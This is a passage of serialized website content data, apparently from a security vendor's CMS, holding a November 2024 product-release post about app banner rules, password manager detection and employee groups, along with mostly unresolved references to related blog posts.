2024",{"items":167350},[167351],{"sys":167352,"name":18399},{"id":18398},{"items":167354},[167355],{"__typename":1528,"sys":167356,"content":167358,"title":167647,"synopsis":167648,"hashTags":118,"publishedDate":167649,"slug":167650,"tagsCollection":167651,"authorsCollection":167657},{"id":167357},"7zpbhFfV42vlPLJcYrjXdH",{"json":167359},{"data":167360,"content":167361,"nodeType":165},{},[167362,167368,167401,167407,167422,167437,167480,167486,167493,167510,167516,167532,167548,167554,167570,167588,167594,167609,167616,167623,167629],{"data":167363,"content":167364,"nodeType":169},{},[167365],{"data":167366,"marks":167367,"value":18415,"nodeType":173},{},[],{"data":167369,"content":167370,"nodeType":250},{},[167371,167381,167391],{"data":167372,"content":167373,"nodeType":254},{},[167374],{"data":167375,"content":167376,"nodeType":178},{},[167377],{"data":167378,"marks":167379,"value":167380,"nodeType":173},{},[],"Easier management of app banners at scale",{"data":167382,"content":167383,"nodeType":254},{},[167384],{"data":167385,"content":167386,"nodeType":178},{},[167387],{"data":167388,"marks":167389,"value":167390,"nodeType":173},{},[],"Identify where unapproved password managers are in use",{"data":167392,"content":167393,"nodeType":254},{},[167394],{"data":167395,"content":167396,"nodeType":178},{},[167397],{"data":167398,"marks":167399,"value":167400,"nodeType":173},{},[],"Organize employees into groups",{"data":167402,"content":167403,"nodeType":169},{},[167404],{"data":167405,"marks":167406,"value":167380,"nodeType":173},{},[],{"data":167408,"content":167409,"nodeType":178},{},[167410,167414,167419],{"data":167411,"marks":167412,"value":167413,"nodeType":173},{},[],"You can now set app banners based on nuanced criteria such as employee groups, approval status, custom labels, and more using our ",{"data":167415,"marks":167416,"value":167418,"nodeType":173},{},[167417],{"type":370},"rules",{"data":167420,"marks":167421,"value":156489,"nodeType":173},{},[],{"data":167423,"content":167424,"nodeType":178},{},[167425,167429,167433],{"data":167426,"marks":167427,"value":167428,"nodeType":173},{},[],"With ",{"data":167430,"marks":167431,"value":167418,"nodeType":173},{},[167432],{"type":370},{"data":167434,"marks":167435,"value":167436,"nodeType":173},{},[],", you can do powerful things like:",{"data":167438,"content":167439,"nodeType":250},{},[167440,167450,167460,167470],{"data":167441,"content":167442,"nodeType":254},{},[167443],{"data":167444,"content":167445,"nodeType":178},{},[167446],{"data":167447,"marks":167448,"value":167449,"nodeType":173},{},[],"Block a compromised app while you investigate.",{"data":167451,"content":167452,"nodeType":254},{},[167453],{"data":167454,"content":167455,"nodeType":178},{},[167456],{"data":167457,"marks":167458,"value":167459,"nodeType":173},{},[],"Block all unapproved apps.",{"data":167461,"content":167462,"nodeType":254},{},[167463],{"data":167464,"content":167465,"nodeType":178},{},[167466],{"data":167467,"marks":167468,"value":167469,"nodeType":173},{},[],"Restrict app usage for specific employee groups while allowing it for others.",{"data":167471,"content":167472,"nodeType":254},{},[167473],{"data":167474,"content":167475,"nodeType":178},{},[167476],{"data":167477,"marks":167478,"value":167479,"nodeType":173},{},[],"Test new banner modes for a small group before deploying more widely.",{"data":167481,"content":167485,"nodeType":312},{"target":167482},{"sys":167483},{"id":167484,"type":317,"linkType":318},"2Ug9KhBmzAE3HRrDH0NCUT",[],{"data":167487,"content":167488,"nodeType":178},{},[167489],{"data":167490,"marks":167491,"value":167492,"nodeType":173},{},[],"If you already use app banners, you don’t need to do anything — we’ve already moved over your configurations to the new rules model.",{"data":167494,"content":167495,"nodeType":178},{},[167496,167499,167507],{"data":167497,"marks":167498,"value":37,"nodeType":173},{},[],{"data":167500,"content":167503,"nodeType":1698},{"target":167501},{"sys":167502},{"id":83443,"type":317,"linkType":318},[167504],{"data":167505,"marks":167506,"value":18605,"nodeType":173},{},[],{"data":167508,"marks":167509,"value":37,"nodeType":173},{},[],{"data":167511,"content":167512,"nodeType":169},{},[167513],{"data":167514,"marks":167515,"value":167390,"nodeType":173},{},[],{"data":167517,"content":167518,"nodeType":178},{},[167519,167523,167528],{"data":167520,"marks":167521,"value":167522,"nodeType":173},{},[],"Ensure employees are storing corporate credentials only in approved password managers with our new ",{"data":167524,"marks":167525,"value":167527,"nodeType":173},{},[167526],{"type":370},"password manager identification",{"data":167529,"marks":167530,"value":167531,"nodeType":173},{},[]," feature. ",{"data":167533,"content":167534,"nodeType":178},{},[167535,167539,167544],{"data":167536,"marks":167537,"value":167538,"nodeType":173},{},[],"The Push browser agent can now ",{"data":167540,"marks":167541,"value":167543,"nodeType":173},{},[167542],{"type":370},"fingerprint commonly used password managers",{"data":167545,"marks":167546,"value":167547,"nodeType":173},{},[]," to identify which ones are being used across your environment. With the rise of infostealer malware, many security teams are defending against scenarios where users’ personal password managers get compromised, allowing attackers to pivot to corporate environments and assets.",{"data":167549,"content":167553,"nodeType":312},{"target":167550},{"sys":167551},{"id":167552,"type":317,"linkType":318},"4XZ7OtBG17Oe4aqtYsfi0E",[],{"data":167555,"content":167556,"nodeType":178},{},[167557,167561,167566],{"data":167558,"marks":167559,"value":167560,"nodeType":173},{},[],"Now you can use Push to ",{"data":167562,"marks":167563,"value":167565,"nodeType":173},{},[167564],{"type":370},"know exactly where corporate creds are stored",{"data":167567,"marks":167568,"value":167569,"nodeType":173},{},[]," and address unauthorized usage.",{"data":167571,"content":167572,"nodeType":178},{},[167573,167576,167585],{"data":167574,"marks":167575,"value":37,"nodeType":173},{},[],{"data":167577,"content":167581,"nodeType":1698},{"target":167578},{"sys":167579},{"id":167580,"type":317,"linkType":318},"5FbtEQCr5slMLF78TTo1W2",[167582],{"data":167583,"marks":167584,"value":18605,"nodeType":173},{},[],{"data":167586,"marks":167587,"value":37,"nodeType":173},{},[],{"data":167589,"content":167590,"nodeType":169},{},[167591],{"data":167592,"marks":167593,"value":167400,"nodeType":173},{},[],{"data":167595,"content":167596,"nodeType":178},{},[167597,167600,167605],{"data":167598,"marks":167599,"value":65284,"nodeType":173},{},[],{"data":167601,"marks":167602,"value":167604,"nodeType":173},{},[167603],{"type":370},"add group assignments to employee records",{"data":167606,"marks":167607,"value":167608,"nodeType":173},{},[]," in Push and then filter employees, apps, and accounts by group information to give you better context on your identity attack surface. ",{"data":167610,"content":167611,"nodeType":178},{},[167612],{"data":167613,"marks":167614,"value":167615,"nodeType":173},{},[],"Groups can be synced in via the Push REST API from your identity provider, or added manually.",{"data":167617,"content":167618,"nodeType":178},{},[167619],{"data":167620,"marks":167621,"value":167622,"nodeType":173},{},[],"Then use groups to drive other Push features, like rules for app banners, mentioned above.",{"data":167624,"content":167628,"nodeType":312},{"target":167625},{"sys":167626},{"id":167627,"type":317,"linkType":318},"7BJDvYlHy4zt3FwntrL3TT",[],{"data":167630,"content":167631,"nodeType":178},{},[167632,167635,167644],{"data":167633,"marks":167634,"value":37,"nodeType":173},{},[],{"data":167636,"content":167640,"nodeType":1698},{"target":167637},{"sys":167638},{"id":167639,"type":317,"linkType":318},"18xzRG6WK9rBGp37Epttu6",[167641],{"data":167642,"marks":167643,"value":18605,"nodeType":173},{},[],{"data":167645,"marks":167646,"value":37,"nodeType":173},{},[],"Product release: November 2024","Here’s what’s new on the Push platform for November 2024.","2024-11-12T00:00:00.000Z","product-release-november-2024",{"items":167652},[167653,167655],{"sys":167654,"name":18399},{"id":18398},{"sys":167656,"name":26137},{"id":26136},{"items":167658},[167659],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":167660},{"url":19129},{"items":167662},[167663],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":167664},{"url":19129},{"json":167666,"links":168008},{"data":167667,"content":167668,"nodeType":165},{},[167669,167675,167714,167720,167733,167746,167763,167768,167788,167805,167811,167824,167837,167842,167862,167879,167885,167898,167918,167945,167962,167968,167981,167987,167993],{"data":167670,"content":167671,"nodeType":169},{},[167672],{"data":167673,"marks":167674,"value":18415,"nodeType":173},{},[],{"data":167676,"content":167677,"nodeType":250},{},[167678,167687,167696,167705],{"data":167679,"content":167680,"nodeType":254},{},[167681],{"data":167682,"content":167683,"nodeType":178},{},[167684],{"data":167685,"marks":167686,"value":148555,"nodeType":173},{},[],{"data":167688,"content":167689,"nodeType":254},{},[167690],{"data":167691,"content":167692,"nodeType":178},{},[167693],{"data":167694,"marks":167695,"value":148565,"nodeType":173},{},[],{"data":167697,"content":167698,"nodeType":254},{},[167699],{"data":167700,"content":167701,"nodeType":178},{},[167702],{"data":167703,"marks":167704,"value":148575,"nodeType":173},{},[],{"data":167706,"content":167707,"nodeType":254},{},[167708],{"data":167709,"content":167710,"nodeType":178},{},[167711],{"data":167712,"marks":167713,"value":148585,"nodeType":173},{},[],{"data":167715,"content":167716,"nodeType":169},{},[167717],{"data":167718,"marks":167719,"value":148592,"nodeType":173},{},[],{"data":167721,"content":167722,"nodeType":178},{},[167723,167726,167730],{"data":167724,"marks":167725,"value":148599,"nodeType":173},{},[],{"data":167727,"marks":167728,"value":148604,"nodeType":173},{},[167729],{"type":370},{"data":167731,"marks":167732,"value":148608,"nodeType":173},{},[],{"data":167734,"content":167735,"nodeType":178},{},[167736,167739,167743],{"data":167737,"marks":167738,"value":148615,"nodeType":173},{},[],{"data":167740,"marks":167741,"value":148620,"nodeType":173},{},[167742],{"type":370},{"data":167744,"marks":167745,"value":148624,"nodeType":173},{},[],{"data":167747,"content":167748,"nodeType":178},{},[167749,167752,167760],{"data":167750,"marks":167751,"value":148631,"nodeType":173},{},[],{"data":167753,"content":167756,"nodeType":1698},{"target":167754},{"sys":167755},{"id":148636,"type":317,"linkType":318},[167757],{"data":167758,"marks":167759,"value":24636,"nodeType":173},{},[],{"data":167761,"marks":167762,"value":148644,"nodeType":173},{},[],{"data":167764,"content":167767,"nodeType":312},{"target":167765},{"sys":167766},{"id":148649,"type":317,"linkType":318},[],{"data":167769,"content":167770,"nodeType":178},{},[167771,167774,167778,167781,167785],{"data":167772,"marks":167773,"value":18635,"nodeType":173},{},[],{"data":167775,"marks":167776,"value":148661,"nodeType":173},{},[167777],{"type":370},{"data":167779,"marks":167780,"value":148665,"nodeType":173},{},[],{"data":167782,"marks":167783,"value":18649,"nodeType":173},{},[167784],{"type":370},{"data":167786,"marks":167787,"value":148673,"nodeType":173},{},[],{"data":167789,"content":167790,"nodeType":178},{},[167791,167794,167802],{"data":167792,"marks":167793,"value":148680,"nodeType":173},{},[],{"data":167795,"content":167798,"nodeType":1698},{"target":167796},{"sys":167797},{"id":24713,"type":317,"linkType":318},[167799],{"data":167800,"marks":167801,"value":148689,"nodeType":173},{},[],{"data":167803,"marks":167804,"value":1477,"nodeType":173},{},[],{"data":167806,"content":167807,"nodeType":169},{},[167808],{"data":167809,"marks":167810,"value":148565,"nodeType":173},{},[],{"data":167812,"content":167813,"nodeType":178},{},[167814,167817,167821],{"data":167815,"marks":167816,"value":148705,"nodeType":173},{},[],{"data":167818,"marks":167819,"value":2570,"nodeType":173},{},[167820],{"type":370},{"data":167822,"marks":167823,"value":19294,"nodeType":173},{},[],{"data":167825,"content":167826,"nodeType":178},{},[167827,167830,167834],{"data":167828,"marks":167829,"value":148719,"nodeType":173},{},[],{"data":167831,"marks":167832,"value":148724,"nodeType":173},{},[167833],{"type":370},{"data":167835,"marks":167836,"value":148728,"nodeType":173},{},[],{"data":167838,"content":167841,"nodeType":312},{"target":167839},{"sys":167840},{"id":24808,"type":317,"linkType":318},[],{"data":167843,"content":167844,"nodeType":178},{},[167845,167848,167852,167855,167859],{"data":167846,"marks":167847,"value":148740,"nodeType":173},{},[],{"data":167849,"marks":167850,"value":2570,"nodeType":173},{},[167851],{"type":370},{"data":167853,"marks":167854,"value":148665,"nodeType":173},{},[],{"data":167856,"marks":167857,"value":18649,"nodeType":173},{},[167858],{"type":370},{"data":167860,"marks":167861,"value":148755,"nodeType":173},{},[],{"data":167863,"content":167864,"nodeType":178},{},[167865,167868,167876],{"data":167866,"marks":167867,"value":37,"nodeType":173},{},[],{"data":167869,"content":167872,"nodeType":1698},{"target":167870},{"sys":167871},{"id":2429,"type":317,"linkType":318},[167873],{"data":167874,"marks":167875,"value":148770,"nodeType":173},{},[],{"data":167877,"marks":167878,"value":37,"nodeType":173},{},[],{"data":167880,"content":167881,"nodeType":169},{},[167882],{"data":167883,"marks":167884,"value":148575,"nodeType":173},{},[],{"data":167886,"content":167887,"nodeType":178},{},[167888,167891,167895],{"data":167889,"marks":167890,"value":148786,"nodeType":173},{},[],{"data":167892,"marks":167893,"value":148791,"nodeType":173},{},[167894],{"type":370},{"data":167896,"marks":167897,"value":148795,"nodeType":173},{},[],{"data":167899,"content":167900,"nodeType":178},{},[167901,167904,167908,167911,167915],{"data":167902,"marks":167903,"value":148802,"nodeType":173},{},[],{"data":167905,"marks":167906,"value":148807,"nodeType":173},{},[167907],{"type":370},{"data":167909,"marks":167910,"value":148811,"nodeType":173},{},[],{"data":167912,"marks":167913,"value":71552,"nodeType":173},{},[167914],{"type":370},{"data":167916,"marks":167917,"value":148819,"nodeType":173},{},[],{"data":167919,"content":167920,"nodeType":178},{},[167921,167924,167928,167931,167935,167938,167942],{"data":167922,"marks":167923,"value":148826,"nodeType":173},{},[],{"data":167925,"marks":167926,"value":148831,"nodeType":173},{},[167927],{"type":370},{"data":167929,"marks":167930,"value":148835,"nodeType":173},{},[],{"data":167932,"marks":167933,"value":148807,"nodeType":173},{},[167934],{"type":370},{"data":167936,"marks":167937,"value":148843,"nodeType":173},{},[],{"data":167939,"marks":167940,"value":148848,"nodeType":173},{},[167941],{"type":370},{"data":167943,"marks":167944,"value":148852,"nodeType":173},{},[],{"data":167946,"content":167947,"nodeType":178},{},[167948,167951,167959],{"data":167949,"marks":167950,"value":37,"nodeType":173},{},[],{"data":167952,"content":167955,"nodeType":1698},{"target":167953},{"sys":167954},{"id":148863,"type":317,"linkType":318},[167956],{"data":167957,"marks":167958,"value":18605,"nodeType":173},{},[],{"data":167960,"marks":167961,"value":37,"nodeType":173},{},[],{"data":167963,"content":167964,"nodeType":169},{},[167965],{"data":167966,"marks":167967,"value":148585,"nodeType":173},{},[],{"data":167969,"content":167970,"nodeType":178},{},[167971,167974,167978],{"data":167972,"marks":167973,"value":148883,"nodeType":173},{},[],{"data":167975,"marks":167976,"value":148888,"nodeType":173},{},[167977],{"type":370},{"data":167979,"marks":167980,"value":1477,"nodeType":173},{},[],{"data":167982,"content":167983,"nodeType":178},{},[167984],{"data":167985,"marks":167986,"value":148898,"nodeType":173},{},[],{"data":167988,"content":167989,"nodeType":178},{},[167990],{"data":167991,"marks":167992,"value":148905,"nodeType":173},{},[],{"data":167994,"content":167995,"nodeType":178},{},[167996,167999,168005],{"data":167997,"marks":167998,"value":37,"nodeType":173},{},[],{"data":168000,"content":168001,"nodeType":186},{"uri":148914},[168002],{"data":168003,"marks":168004,"value":18605,"nodeType":173},{},[],{"data":168006,"marks":168007,"value":37,"nodeType":173},{},[],{"entries":168009},{"inline":168010,"hyperlink":168011,"block":168025},[],[168012,168016,168018,168020],{"sys":168013,"__typename":1528,"title":168014,"slug":168015},{"id":148636},"What the rise of infostealers says about identity attacks","what-the-rise-of-infostealers-says-about-identity-attacks",{"sys":168017,"__typename":1528,"title":46310,"slug":46311},{"id":24713},{"sys":168019,"__typename":6655,"title":6681,"slug":6682,"articleId":6683},{"id":2429},{"sys":168021,"__typename":6655,"title":168022,"slug":168023,"articleId":168024},{"id":148863},"What apps appear in the ‘Other apps’ list in Push?","what-apps-appear-in-the-other-apps-list-in-push",10100,[168026,168033],{"sys":168027,"__typename":5345,"title":168028,"caption":118,"layoutMode":118,"file":168029},{"id":148649},"Stolen creds detection example - KB 10126",{"url":168030,"width":168031,"height":168032},"https://images.ctfassets.net/y1cdw1ablpvd/10hLISFPMFMCmatHDrdCOy/f706764340f828221f18acc9bc9a6d34/stolen_creds_example_slideout.png",783,1229,{"sys":168034,"__typename":5345,"title":46390,"caption":118,"layoutMode":118,"file":168035},{"id":24808},{"url":46392,"width":46393,"height":46394},"content:blog:product-release-december-2024.json","blog/product-release-december-2024.json","blog/product-release-december-2024",{"_path":168040,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":168041,"ogImage":118,"summary":168043,"title":155968,"subtitle":118,"metaTitle":168054,"synopsis":155969,"hashTags":118,"publishedDate":155970,"slug":155971,"tagsCollection":168055,"relatedBlogPostsCollection":168061,"authorsCollection":169760,"content":169764,"_id":170059,"_type":5439,"_source":5440,"_file":170060,"_stem":170061,"_extension":5439},"/blog/automating-sso-password-resets-using-push",{"id":155651,"publishedAt":168042},"2026-04-13T10:04:46.519Z",{"json":168044},{"data":168045,"content":168046,"nodeType":165},{},[168047],{"data":168048,"content":168049,"nodeType":178},{},[168050],{"data":168051,"marks":168052,"value":168053,"nodeType":173},{},[],"Automate password resets for your most critical identities when a password vulnerability is detected, such as when an employee reuses their SSO password outside of SSO, or valid credentials are detected in a compromised credential feed.","Using Push to automate SSO password resets",{"items":168056},[168057,168059],{"sys":168058,"name":26137},{"id":26136},{"sys":168060,"name":509},{"id":508},{"items":168062},[168063,168677,169060],{"__typename":1528,"sys":168064,"content":168065,"title":46310,"synopsis":155637,"hashTags":118,"publishedDate":155638,"slug":46311,"tagsCollection":168667,"authorsCollection":168673},{"id":24713},{"json":168066},{"nodeType":165,"data":168067,"content":168068},{},[168069,168074,168077,168090,168096,168102,168107,168113,168129,168144,168150,168155,168161,168164,168170,168176,168182,168188,168194,168200,168229,168234,168240,168243,168249,168255,168353,168359,168375,168381,168397,168403,168420,168426,168442,168445,168451,168457,168463,168489,168495,168501,168516,168521,168527,168533,168538,168544,168601,168607,168613,168619,168625,168631,168634,168640,168656,168661],{"nodeType":312,"data":168070,"content":168073},{"target":168071},{"sys":168072},{"id":154952,"type":317,"linkType":318},[],{"nodeType":231,"data":168075,"content":168076},{},[],{"nodeType":178,"data":168078,"content":168079},{},[168080,168083,168087],{"nodeType":173,"value":154961,"marks":168081,"data":168082},[],{},{"nodeType":173,"value":154965,"marks":168084,"data":168086},[168085],{"type":1646},{},{"nodeType":173,"value":154970,"marks":168088,"data":168089},[],{},{"nodeType":178,"data":168091,"content":168092},{},[168093],{"nodeType":173,"value":154977,"marks":168094,"data":168095},[],{},{"nodeType":178,"data":168097,"content":168098},{},[168099],{"nodeType":173,"value":154984,"marks":168100,"data":168101},[],{},{"nodeType":312,"data":168103,"content":168106},{"target":168104},{"sys":168105},{"id":154991,"type":317,"linkType":318},[],{"nodeType":178,"data":168108,"content":168109},{},[168110],{"nodeType":173,"value":154997,"marks":168111,"data":168112},[],{},{"nodeType":3769,"data":168114,"content":168115},{},[168116],{"nodeType":178,"data":168117,"content":168118},{},[168119,168122,168126],{"nodeType":173,"value":155007,"marks":168120,"data":168121},[],{},{"nodeType":173,"value":155011,"marks":168123,"data":168125},[168124],{"type":370},{},{"nodeType":173,"value":2340,"marks":168127,"data":168128},[],{},{"nodeType":178,"data":168130,"content":168131},{},[168132,168135,168141],{"nodeType":173,"value":155022,"marks":168133,"data":168134},[],{},{"nodeType":186,"data":168136,"content":168137},{"uri":155027},[168138],{"nodeType":173,"value":155030,"marks":168139,"data":168140},[],{},{"nodeType":173,"value":155034,"marks":168142,"data":168143},[],{},{"nodeType":178,"data":168145,"content":168146},{},[168147],{"nodeType":173,"value":155041,"marks":168148,"data":168149},[],{},{"nodeType":312,"data":168151,"content":168154},{"target":168152},{"sys":168153},{"id":155048,"type":317,"linkType":318},[],{"nodeType":178,"data":168156,"content":168157},{},[168158],{"nodeType":173,"value":155054,"marks":168159,"data":168160},[],{},{"nodeType":231,"data":168162,"content":168163},{},[],{"nodeType":169,"data":168165,"content":168166},{},[168167],{"nodeType":173,"value":155064,"marks":168168,"data":168169},[],{},{"nodeType":178,"data":168171,"content":168172},{},[168173],{"nodeType":173,"value":155071,"marks":168174,"data":168175},[],{},{"nodeType":178,"data":168177,"content":168178},{},[168179],{"nodeType":173,"value":155078,"marks":168180,"data":168181},[],{},{"nodeType":235,"data":168183,"content":168184},{},[168185],{"nodeType":173,"value":155085,"marks":168186,"data":168187},[],{},{"nodeType":178,"data":168189,"content":168190},{},[168191],{"nodeType":173,"value":155092,"marks":168192,"data":168193},[],{},{"nodeType":178,"data":168195,"content":168196},{},[168197],{"nodeType":173,"value":155099,"marks":168198,"data":168199},[],{},{"nodeType":250,"data":168201,"content":168202},{},[168203,168216],{"nodeType":254,"data":168204,"content":168205},{},[168206],{"nodeType":178,"data":168207,"content":168208},{},[168209,168213],{"nodeType":173,"value":155112,"marks":168210,"data":168212},[168211],{"type":370},{},{"nodeType":173,"value":155117,"marks":168214,"data":168215},[],{},{"nodeType":254,"data":168217,"content":168218},{},[168219],{"nodeType":178,"data":168220,"content":168221},{},[168222,168226],{"nodeType":173,"value":155127,"marks":168223,"data":168225},[168224],{"type":370},{},{"nodeType":173,"value":155132,"marks":168227,"data":168228},[],{},{"nodeType":312,"data":168230,"content":168233},{"target":168231},{"sys":168232},{"id":155139,"type":317,"linkType":318},[],{"nodeType":178,"data":168235,"content":168236},{},[168237],{"nodeType":173,"value":155145,"marks":168238,"data":168239},[],{},{"nodeType":231,"data":168241,"content":168242},{},[],{"nodeType":169,"data":168244,"content":168245},{},[168246],{"nodeType":173,"value":155155,"marks":168247,"data":168248},[],{},{"nodeType":178,"data":168250,"content":168251},{},[168252],{"nodeType":173,"value":155162,"marks":168253,"data":168254},[],{},{"nodeType":250,"data":168256,"content":168257},{},[168258,168277,168296,168315,168344],{"nodeType":254,"data":168259,"content":168260},{},[168261],{"nodeType":178,"data":168262,"content":168263},{},[168264,168267,168274],{"nodeType":173,"value":5039,"marks":168265,"data":168266},[],{},{"nodeType":186,"data":168268,"content":168269},{"uri":125982},[168270],{"nodeType":173,"value":155181,"marks":168271,"data":168273},[168272],{"type":194},{},{"nodeType":173,"value":155186,"marks":168275,"data":168276},[],{},{"nodeType":254,"data":168278,"content":168279},{},[168280],{"nodeType":178,"data":168281,"content":168282},{},[168283,168286,168293],{"nodeType":173,"value":37,"marks":168284,"data":168285},[],{},{"nodeType":186,"data":168287,"content":168288},{"uri":155200},[168289],{"nodeType":173,"value":155203,"marks":168290,"data":168292},[168291],{"type":194},{},{"nodeType":173,"value":155208,"marks":168294,"data":168295},[],{},{"nodeType":254,"data":168297,"content":168298},{},[168299],{"nodeType":178,"data":168300,"content":168301},{},[168302,168305,168312],{"nodeType":173,"value":155218,"marks":168303,"data":168304},[],{},{"nodeType":186,"data":168306,"content":168307},{"uri":155223},[168308],{"nodeType":173,"value":155226,"marks":168309,"data":168311},[168310],{"type":194},{},{"nodeType":173,"value":155231,"marks":168313,"data":168314},[],{},{"nodeType":254,"data":168316,"content":168317},{},[168318],{"nodeType":178,"data":168319,"content":168320},{},[168321,168324,168331,168334,168341],{"nodeType":173,"value":155241,"marks":168322,"data":168323},[],{},{"nodeType":186,"data":168325,"content":168326},{"uri":155246},[168327],{"nodeType":173,"value":155249,"marks":168328,"data":168330},[168329],{"type":194},{},{"nodeType":173,"value":155254,"marks":168332,"data":168333},[],{},{"nodeType":186,"data":168335,"content":168336},{"uri":155259},[168337],{"nodeType":173,"value":155262,"marks":168338,"data":168340},[168339],{"type":194},{},{"nodeType":173,"value":155267,"marks":168342,"data":168343},[],{},{"nodeType":254,"data":168345,"content":168346},{},[168347],{"nodeType":178,"data":168348,"content":168349},{},[168350],{"nodeType":173,"value":155277,"marks":168351,"data":168352},[],{},{"nodeType":178,"data":168354,"content":168355},{},[168356],{"nodeType":173,"value":155284,"marks":168357,"data":168358},[],{},{"nodeType":178,"data":168360,"content":168361},{},[168362,168365,168372],{"nodeType":173,"value":37,"marks":168363,"data":168364},[],{},{"nodeType":186,"data":168366,"content":168367},{"uri":155200},[168368],{"nodeType":173,"value":155297,"marks":168369,"data":168371},[168370],{"type":194},{},{"nodeType":173,"value":155302,"marks":168373,"data":168374},[],{},{"nodeType":235,"data":168376,"content":168377},{},[168378],{"nodeType":173,"value":155309,"marks":168379,"data":168380},[],{},{"nodeType":178,"data":168382,"content":168383},{},[168384,168387,168394],{"nodeType":173,"value":155316,"marks":168385,"data":168386},[],{},{"nodeType":186,"data":168388,"content":168389},{"uri":126102},[168390],{"nodeType":173,"value":155323,"marks":168391,"data":168393},[168392],{"type":194},{},{"nodeType":173,"value":1477,"marks":168395,"data":168396},[],{},{"nodeType":178,"data":168398,"content":168399},{},[168400],{"nodeType":173,"value":155334,"marks":168401,"data":168402},[],{},{"nodeType":178,"data":168404,"content":168405},{},[168406,168409,168417],{"nodeType":173,"value":155341,"marks":168407,"data":168408},[],{},{"nodeType":186,"data":168410,"content":168411},{"uri":81621},[168412],{"nodeType":173,"value":155348,"marks":168413,"data":168416},[168414,168415],{"type":194},{"type":370},{},{"nodeType":173,"value":155354,"marks":168418,"data":168419},[],{},{"nodeType":178,"data":168421,"content":168422},{},[168423],{"nodeType":173,"value":155361,"marks":168424,"data":168425},[],{},{"nodeType":178,"data":168427,"content":168428},{},[168429,168432,168439],{"nodeType":173,"value":155368,"marks":168430,"data":168431},[],{},{"nodeType":186,"data":168433,"content":168434},{"uri":4492},[168435],{"nodeType":173,"value":111468,"marks":168436,"data":168438},[168437],{"type":194},{},{"nodeType":173,"value":155379,"marks":168440,"data":168441},[],{},{"nodeType":231,"data":168443,"content":168444},{},[],{"nodeType":169,"data":168446,"content":168447},{},[168448],{"nodeType":173,"value":155389,"marks":168449,"data":168450},[],{},{"nodeType":178,"data":168452,"content":168453},{},[168454],{"nodeType":173,"value":155396,"marks":168455,"data":168456},[],{},{"nodeType":178,"data":168458,"content":168459},{},[168460],{"nodeType":173,"value":155403,"marks":168461,"data":168462},[],{},{"nodeType":178,"data":168464,"content":168465},{},[168466,168469,168476,168479,168486],{"nodeType":173,"value":155410,"marks":168467,"data":168468},[],{},{"nodeType":186,"data":168470,"content":168471},{"uri":155415},[168472],{"nodeType":173,"value":155418,"marks":168473,"data":168475},[168474],{"type":194},{},{"nodeType":173,"value":155423,"marks":168477,"data":168478},[],{},{"nodeType":186,"data":168480,"content":168481},{"uri":111913},[168482],{"nodeType":173,"value":155430,"marks":168483,"data":168485},[168484],{"type":194},{},{"nodeType":173,"value":155435,"marks":168487,"data":168488},[],{},{"nodeType":178,"data":168490,"content":168491},{},[168492],{"nodeType":173,"value":155442,"marks":168493,"data":168494},[],{},{"nodeType":178,"data":168496,"content":168497},{},[168498],{"nodeType":173,"value":155449,"marks":168499,"data":168500},[],{},{"nodeType":178,"data":168502,"content":168503},{},[168504,168507,168513],{"nodeType":173,"value":155456,"marks":168505,"data":168506},[],{},{"nodeType":186,"data":168508,"content":168509},{"uri":819},[168510],{"nodeType":173,"value":155463,"marks":168511,"data":168512},[],{},{"nodeType":173,"value":155467,"marks":168514,"data":168515},[],{},{"nodeType":312,"data":168517,"content":168520},{"target":168518},{"sys":168519},{"id":155474,"type":317,"linkType":318},[],{"nodeType":235,"data":168522,"content":168523},{},[168524],{"nodeType":173,"value":155480,"marks":168525,"data":168526},[],{},{"nodeType":178,"data":168528,"content":168529},{},[168530],{"nodeType":173,"value":155487,"marks":168531,"data":168532},[],{},{"nodeType":312,"data":168534,"content":168537},{"target":168535},{"sys":168536},{"id":155494,"type":317,"linkType":318},[],{"nodeType":178,"data":168539,"content":168540},{},[168541],{"nodeType":173,"value":100610,"marks":168542,"data":168543},[],{},{"nodeType":250,"data":168545,"content":168546},{},[168547,168565,168574,168583,168592],{"nodeType":254,"data":168548,"content":168549},{},[168550],{"nodeType":178,"data":168551,"content":168552},{},[168553,168556,168562],{"nodeType":173,"value":155512,"marks":168554,"data":168555},[],{},{"nodeType":186,"data":168557,"content":168558},{"uri":155517},[168559],{"nodeType":173,"value":155030,"marks":168560,"data":168561},[],{},{"nodeType":173,"value":2340,"marks":168563,"data":168564},[],{},{"nodeType":254,"data":168566,"content":168567},{},[168568],{"nodeType":178,"data":168569,"content":168570},{},[168571],{"nodeType":173,"value":155532,"marks":168572,"data":168573},[],{},{"nodeType":254,"data":168575,"content":168576},{},[168577],{"nodeType":178,"data":168578,"content":168579},{},[168580],{"nodeType":173,"value":155542,"marks":168581,"data":168582},[],{},{"nodeType":254,"data":168584,"content":168585},{},[168586],{"nodeType":178,"data":168587,"content":168588},{},[168589],{"nodeType":173,"value":155552,"marks":168590,"data":168591},[],{},{"nodeType":254,"data":168593,"content":168594},{},[168595],{"nodeType":178,"data":168596,"content":168597},{},[168598],{"nodeType":173,"value":105070,"marks":168599,"data":168600},[],{},{"nodeType":178,"data":168602,"content":168603},{},[168604],{"nodeType":173,"value":155568,"marks":168605,"data":168606},[],{},{"nodeType":178,"data":168608,"content":168609},{},[168610],{"nodeType":173,"value":155575,"marks":168611,"data":168612},[],{},{"nodeType":235,"data":168614,"content":168615},{},[168616],{"nodeType":173,"value":155582,"marks":168617,"data":168618},[],{},{"nodeType":178,"data":168620,"content":168621},{},[168622],{"nodeType":173,"value":155589,"marks":168623,"data":168624},[],{},{"nodeType":178,"data":168626,"content":168627},{},[168628],{"nodeType":173,"value":155596,"marks":168629,"data":168630},[],{},{"nodeType":231,"data":168632,"content":168633},{},[],{"nodeType":169,"data":168635,"content":168636},{},[168637],{"nodeType":173,"value":155606,"marks":168638,"data":168639},[],{},{"nodeType":178,"data":168641,"content":168642},{},[168643,168646,168653],{"nodeType":173,"value":155613,"marks":168644,"data":168645},[],{},{"nodeType":186,"data":168647,"content":168648},{"uri":473},[168649],{"nodeType":173,"value":71815,"marks":168650,"data":168652},[168651],{"type":194},{},{"nodeType":173,"value":197,"marks":168654,"data":168655},[],{},{"nodeType":312,"data":168657,"content":168660},{"target":168658},{"sys":168659},{"id":4766,"type":317,"linkType":318},[],{"nodeType":178,"data":168662,"content":168663},{},[168664],{"nodeType":173,"value":37,"marks":168665,"data":168666},[],{},{"items":168668},[168669,168671],{"sys":168670,"name":18399},{"id":18398},{"sys":168672,"name":509},{"id":508},{"items":168674},[168675],{"fullName":2908,"firstN